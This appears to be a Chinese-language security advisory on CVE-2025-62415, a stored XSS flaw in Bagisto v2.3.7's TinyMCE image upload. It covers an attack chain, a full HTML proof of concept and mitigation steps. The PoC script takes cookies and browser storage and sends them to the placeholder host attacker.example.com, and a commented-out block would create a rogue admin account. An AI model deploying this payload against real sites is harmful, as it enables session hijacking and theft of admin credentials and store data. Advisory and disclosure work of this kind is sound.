CVE-2025-62415 Bagisto TinyMCE图片上传存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62415

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Bagisto（基于Laravel的开源电商平台）

漏洞概述

CVE-2025-62415是Bagisto电商平台v2.3.7版本中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于Bagisto集成的TinyMCE富文本编辑器的图片上传功能中。由于平台在处理用户上传的图片文件时，未对文件类型和内容进行充分的验证与过滤，攻击者可以在拥有足够权限（如管理员权限）的情况下，通过该上传功能上传一个精心构造的HTML文件，该HTML文件中嵌入了恶意的JavaScript代码。当其他管理员或用户通过浏览器查看该上传的文件时，嵌入的恶意脚本将在受害者浏览器的上下文中执行，从而实现会话劫持、敏感信息窃取、权限提升或进一步的攻击行为。该漏洞的CVSS评分为6.9，属于中危级别，其攻击向量为网络攻击，需要高权限（管理员）才能利用，且需要用户交互（如查看上传的文件）来触发。尽管利用条件相对受限，但由于执行上下文为管理员浏览器，一旦成功利用，可能导致整个电商平台的后台管理权限被完全控制，造成严重的机密信息泄露。该漏洞已在Bagisto v2.3.8版本中修复，建议受影响的用户尽快升级至最新版本以消除风险。

技术细节

该漏洞的核心问题在于Bagisto v2.3.7版本中TinyMCE富文本编辑器集成的图片上传功能缺乏对上传文件类型的严格校验。TinyMCE作为一款流行的富文本编辑器，其图片上传接口通常应仅接受图片格式（如PNG、JPG、GIF等），但Bagisto的实现未对文件扩展名和MIME类型进行充分的服务器端验证。具体利用方式如下：

1. 攻击者首先需要获取Bagisto平台的管理员或其他具有上传权限的账户凭证（通过社会工程、凭据填充或其他方式）。
2. 登录后台后，攻击者利用TinyMCE编辑器的图片上传功能，上传一个扩展名为.html或.htm的文件，其中包含恶意的JavaScript代码。
3. 由于服务器端未对文件类型进行白名单校验，恶意HTML文件被成功上传并存储在服务器上。
4. 当其他管理员或用户通过浏览器访问或预览该文件时，浏览器会解析HTML内容并执行其中嵌入的恶意JavaScript。
5. 恶意脚本在受害者的浏览器上下文中执行，可以窃取会话Cookie、CSRF令牌等敏感信息，或执行管理操作（如创建新管理员账户、修改商品信息等）。

该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N，表明攻击复杂度低，但需要高权限和用户交互，且影响范围会扩散到其他组件。由于执行环境为管理员浏览器，机密性影响为高。

攻击链分析

STEP 1

步骤1：获取初始访问权限

攻击者通过社会工程、凭据填充、钓鱼攻击或其他方式获取Bagisto平台管理员或其他具有富文本编辑权限的账户凭证。

STEP 2

步骤2：登录管理后台

使用获取的管理员凭证登录Bagisto管理后台，访问包含TinyMCE富文本编辑器的页面（如商品描述、分类描述、CMS页面等）。

STEP 3

步骤3：上传恶意HTML文件

利用TinyMCE的图片上传功能，上传一个精心构造的HTML文件，该文件中嵌入了恶意的JavaScript代码。由于服务器端未对文件类型进行严格校验，恶意文件被成功上传并存储。

STEP 4

步骤4：诱导受害者查看

攻击者通过各种方式（如发送通知、在页面中嵌入链接等）诱导其他管理员或用户通过浏览器查看上传的恶意HTML文件。

STEP 5

步骤5：恶意脚本执行

受害者在浏览器中查看恶意HTML文件时，嵌入的JavaScript代码在其浏览器上下文中执行，可窃取会话Cookie、CSRF令牌等敏感信息。

STEP 6

步骤6：权限提升与持久化

利用窃取的会话信息，攻击者可以执行管理操作，如创建新的管理员账户、修改商品价格、窃取用户数据等，实现对平台的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!DOCTYPE html> <html> <head> <title>Product Image</title> </head> <body> <h1>Product Image</h1>  <script> // Step 4: When admin/user views this file in browser, the script executes // Exfiltrate session cookies and CSRF tokens to attacker's server var attackerServer = "https://attacker.example.com/collect"; var stolenData = { cookies: document.cookie, url: window.location.href, // Attempt to fetch admin API endpoints to steal sensitive data localStorage: JSON.stringify(localStorage), sessionStorage: JSON.stringify(sessionStorage) }; // Send stolen data to attacker server var img = new Image(); img.src = attackerServer + "?data=" + encodeURIComponent(JSON.stringify(stolenData)); // Optional: Perform actions as the admin (e.g., create new admin user) // fetch('/admin/customers/store', { // method: 'POST', // headers: { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': document.querySelector('meta[name="csrf-token"]').content }, // body: JSON.stringify({ email: '[email protected]', password: 'P@ssw0rd!', role: 'Administrator' }) // }); </script> <img src="legitimate_image.png" alt="Product" /> </body> </html>

影响范围

Bagisto < 2.3.8

防御指南

临时缓解措施

在无法立即升级到v2.3.8版本的情况下，建议采取以下临时缓解措施：1）在Web服务器层面配置上传目录，禁止执行任何服务器端脚本；2）为上传目录设置正确的MIME类型映射，确保HTML文件以application/octet-stream类型提供，强制浏览器下载而非渲染；3）在TinyMCE配置中限制允许的文件扩展名，仅允许图片格式；4）在反向代理或CDN层面添加Content-Security-Policy头，限制上传目录中的脚本执行；5）加强管理员账户的安全策略，包括启用多因素认证、限制登录IP、监控异常操作等；6）定期审查已上传的文件，及时清理可疑的HTML文件。